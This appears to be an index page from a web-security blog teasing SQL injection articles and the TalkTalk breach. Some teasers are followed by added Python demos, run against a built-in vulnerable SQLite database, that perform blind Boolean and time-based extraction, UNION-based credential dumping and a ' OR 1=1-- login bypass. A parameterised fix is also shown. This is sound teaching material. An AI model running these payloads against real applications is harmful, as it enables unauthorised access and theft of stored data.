MSSQL Injection Cheat Sheet
Published: 05 August 2021 Last Updated: 03 July 2023
A cheat sheet of common Microsoft SQL payloads.
Continue Reading
MySQL Injection Cheat Sheet
Published: 05 August 2021 Last Updated: 03 July 2023
A cheat sheet of common MySQL/MariaDB payloads.
Continue Reading
TalkTalk Breach (2015)
Published: 19 October 2020 Last Updated: 03 July 2023
TalkTalk suffered a series of security issues in 2015. Right from the start of the year people were discussing an increased number of scam calls. On 26 February 2015 TalkTalk emailed customers to inform them of a data breach in which account numbers, addresses, and phone numbers were taken. The email detailed that a third-party contractor was believed to be responsible, and that TalkTalk was taking legal action against them. It was believed that “a few thousand” customers were affected.
On 10 August 2017, TalkTalk were fined again for failing to adequately protect personal data “because it allowed staff to have access to large quantities of customer’s data” which “left the data open to exploitation by rogue employees”.
Continue Reading
SQL Injection Exploitation: Blind-Boolean
Published: 19 October 2020 Last Updated: 05 July 2023
Blind injection refers to exploitation where the output of the payload is not displayed directly in the application's response, but the threat actor can still infer what it was. With SQL injection this essentially means asking the database a series of true/false (Boolean) questions to determine its contents. A simple true/false pair can be something like:
AND 1=1
AND 1=2
If the difference between a true statement and a false statement is visible within the application response, then Boolean exploitation is possible. To enable this, Boolean statements need to be crafted which allow the attacker to infer what the database content is, typically by testing one character of a value at a time.
Continue Reading
SQL Injection Exploitation: Time-based
Published: 19 October 2020 Last Updated: 03 July 2023
In terms of crafting payloads, time-based injection is very similar to Blind-Boolean injection: data is still generally extracted from the database one character at a time. The difference is the signal. Time-based exploitation uses a function which causes a temporary pause in the database response, such as SLEEP() in MySQL or WAITFOR DELAY in MSSQL; these differ depending on the database type.
The pause is then placed inside a conditional (for example MySQL's IF(condition, SLEEP(5), 0)) so that the response is delayed only when the Boolean test is true. This makes the technique usable even when the application's visible output is identical for true and false. Response-time measurements are noisy, so use a delay well above normal latency and repeat borderline checks.
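The extraction loop described in the Blind-Boolean and Time-based excerpts above, as an added example that is not code from the original posts. It uses an in-memory SQLite database as a constructed stand-in for the vulnerable application (an assumption: the excerpts target MySQL/MSSQL, so the payload functions here are SQLite's UNICODE/SUBSTR and a SLEEP() registered for the demo rather than MySQL's SLEEP or MSSQL's WAITFOR DELAY). The same binary-search routine serves both oracles; only the way the yes/no answer is read differs.

```python
import sqlite3
import time

# Constructed, deliberately vulnerable target: an in-memory SQLite database
# standing in for the application's backend (assumption; a real target would
# usually be MySQL or MSSQL and the delay function would differ).
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE products (id INTEGER, name TEXT)")
conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
conn.execute("INSERT INTO products VALUES (1, 'widget'), (2, 'gadget')")
conn.execute("INSERT INTO users VALUES ('admin', 'S3cr3t!')")
# SQLite has no SLEEP(); register one so the time-based variant runs offline.
conn.create_function("SLEEP", 1, lambda s: time.sleep(s) or 0)


def vulnerable_lookup(product_id: str) -> bool:
    """Application code with the bug: user input concatenated into SQL.
    Returns True when a product row comes back; that difference in the page
    is the only signal the attacker gets."""
    sql = f"SELECT name FROM products WHERE id = {product_id}"
    try:
        return conn.execute(sql).fetchone() is not None
    except sqlite3.Error:
        return False


def boolean_oracle(condition: str) -> bool:
    """Blind-Boolean: '1 AND (<condition>)' keeps the row only when true."""
    return vulnerable_lookup(f"1 AND ({condition})")


def time_oracle(condition: str, delay: float = 0.05) -> bool:
    """Time-based: same question, answered by response time. The CASE
    mirrors MySQL's IF(cond, SLEEP(n), 0); the row is returned either way."""
    start = time.monotonic()
    vulnerable_lookup(
        f"1 AND (CASE WHEN ({condition}) THEN SLEEP({delay}) ELSE 0 END) = 0"
    )
    return time.monotonic() - start >= delay / 2


def extract_string(oracle, expression: str, max_len: int = 64) -> str:
    """Recover the value of an SQL expression one character at a time,
    binary-searching each character's code point (7 queries per character)."""
    result = ""
    for pos in range(1, max_len + 1):
        # An empty substring means we have run past the end of the value.
        if not oracle(f"LENGTH(SUBSTR(({expression}), {pos}, 1)) = 1"):
            break
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(f"UNICODE(SUBSTR(({expression}), {pos}, 1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        result += chr(lo)
    return result


if __name__ == "__main__":
    target = "SELECT password FROM users WHERE username = 'admin'"
    print("boolean:", extract_string(boolean_oracle, target))
    print("time   :", extract_string(time_oracle, target))
```

Against a real application the two oracle functions would send HTTP requests and inspect the body or the round-trip time; everything else stays the same. The time-based variant costs the delay on every true answer, which is why it is the fallback rather than the first choice.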
Continue Reading
SQL Injection Exploitation: Union-Based
Published: 19 October 2020 Last Updated: 03 July 2023
UNION SELECT statements can be used for retrieving the results of a second SELECT statement by appending it to the end of another query. This is useful for SQL injection as it allows you to append a query to the end of a query executed by a developer to retrieve arbitrary database contents. It’s important to note that the details of the second query must match the first, specifically they must have the same number of columns and those columns must match in type.
Therefore the first step in exploiting SQL injection through UNION injection is to determine how many columns the original query returns. There are two main ways: append UNION SELECT NULL and keep adding one NULL per attempt until the query executes (NULL is accepted in place of any column type, so only the count has to match), or use ORDER BY n and increase n until an error occurs, which implies that the number causing the error is one higher than the number of columns in use.
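Both column-counting methods, followed by the data-retrieving UNION, as an added example that is not code from the original post. The target is a constructed three-column query over an in-memory SQLite database (an assumption; MySQL and MSSQL raise differently worded errors for the same conditions, but the logic is identical).

```python
import sqlite3

# Constructed target: a 3-column query over an in-memory SQLite database
# (assumption; real targets are usually MySQL/MSSQL, whose error text differs).
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE products (id INTEGER, name TEXT, price REAL)")
conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
conn.execute("INSERT INTO products VALUES (1, 'widget', 9.99)")
conn.execute("INSERT INTO users VALUES ('admin', 'S3cr3t!')")


def vulnerable_search(product_id: str) -> list:
    """The developer's query with input concatenated straight in.
    Raises on a SQL error, which the attacker sees as an error page."""
    sql = f"SELECT id, name, price FROM products WHERE id = {product_id}"
    return conn.execute(sql).fetchall()


def count_columns_order_by(max_cols: int = 20) -> int:
    """Increase ORDER BY n until the database complains: the first n that
    errors is one more than the column count."""
    for n in range(1, max_cols + 1):
        try:
            vulnerable_search(f"1 ORDER BY {n}")
        except sqlite3.Error:
            return n - 1
    raise RuntimeError("column count exceeds max_cols")


def count_columns_union(max_cols: int = 20) -> int:
    """Append UNION SELECT NULL,... adding one NULL at a time until the
    query executes; NULL is accepted by every column type, so only the
    count has to match."""
    for n in range(1, max_cols + 1):
        nulls = ", ".join(["NULL"] * n)
        try:
            vulnerable_search(f"1 UNION SELECT {nulls}")
            return n
        except sqlite3.Error:
            continue
    raise RuntimeError("column count exceeds max_cols")


def dump_users() -> list:
    """With the count known, put the wanted values into columns the page
    renders and force the original WHERE to match nothing (id = -1) so
    only the injected rows come back."""
    n = count_columns_union()
    cols = ["NULL"] * n
    cols[0] = "username"
    cols[1] = "password"
    payload = f"-1 UNION SELECT {', '.join(cols)} FROM users"
    return [(row[0], row[1]) for row in vulnerable_search(payload)]


if __name__ == "__main__":
    print("ORDER BY count:", count_columns_order_by())
    print("UNION count   :", count_columns_union())
    print("users         :", dump_users())
```

On databases that enforce type compatibility across a UNION, the NULL placeholders are swapped for the string columns one at a time to find which positions accept text before the real payload is sent.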
Continue Reading
SQL Injection Exploitation: Error-based
Published: 19 October 2020 Last Updated: 03 July 2023
With error-based injection, data can be extracted from the database where an error message can be crafted which contains confidential data. For example:
MySQL: AND ExtractValue('',Concat('=',@@version))
MSSQL: AND 1 in (@@version)
With the MSSQL payload above the intention is to force a string to be converted to an integer; the conversion fails and the resulting error message contains the string. The MySQL payload attempts the same thing through an XPath function: ExtractValue() raises an XPath syntax error that quotes the malformed expression, which here includes the database version. Either way this only works when the application returns database error messages to the client.
Continue Reading
Finding SQL Injection
Published: 19 October 2020 Last Updated: 05 July 2023
SQL injection is an old vulnerability, first published on Christmas Day 1998 in Phrack Magazine 54. The issue occurs where user supplied input is insecurely concatenated into an SQL query. It generally allows a threat actor to perform any of the operations that the database user can execute – such as extracting, changing, or deleting database contents. Rarely, where the database user is highly privileged, this can allow for command execution through features such as the MSSQL xp_cmdshell system stored procedure.
Exploiting the issue manually is often trivial, and there are also freely available exploitation tools such as sqlmap.
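The insecure concatenation described above beside its parameterised fix, with the two manual probes a tester sends first (a stray quote to provoke an error, and a tautology with a comment to bypass the password check). This is an added example, not code from the original post; the login function and the in-memory SQLite users table are constructed for the demo.

```python
import sqlite3

# Constructed users table in an in-memory SQLite database (assumption).
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
conn.execute("INSERT INTO users VALUES ('admin', 'S3cr3t!'), ('bob', 'hunter2')")


def login_vulnerable(username: str, password: str) -> bool:
    """The bug: user input concatenated into the query string."""
    sql = (f"SELECT 1 FROM users WHERE username = '{username}' "
           f"AND password = '{password}'")
    return conn.execute(sql).fetchone() is not None


def login_fixed(username: str, password: str) -> bool:
    """The fix: parameterised query, so input is never parsed as SQL."""
    sql = "SELECT 1 FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone() is not None


def probe(login) -> dict:
    """Two classic manual checks. A single quote should break an injectable
    query; "' OR 1=1--" should log in without a valid password when the
    comment swallows the rest of the WHERE clause."""
    results = {}
    try:
        login("admin'", "x")
        results["quote_error"] = False
    except sqlite3.Error:
        results["quote_error"] = True
    results["tautology_login"] = login("' OR 1=1--", "wrong")
    return results


if __name__ == "__main__":
    print("vulnerable:", probe(login_vulnerable))
    print("fixed     :", probe(login_fixed))
```

The vulnerable version errors on the quote and accepts the tautology; the parameterised version treats both inputs as an ordinary, non-existent username and returns False without an error. Those two behaviours are exactly what a manual or automated scan looks for.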
Continue Reading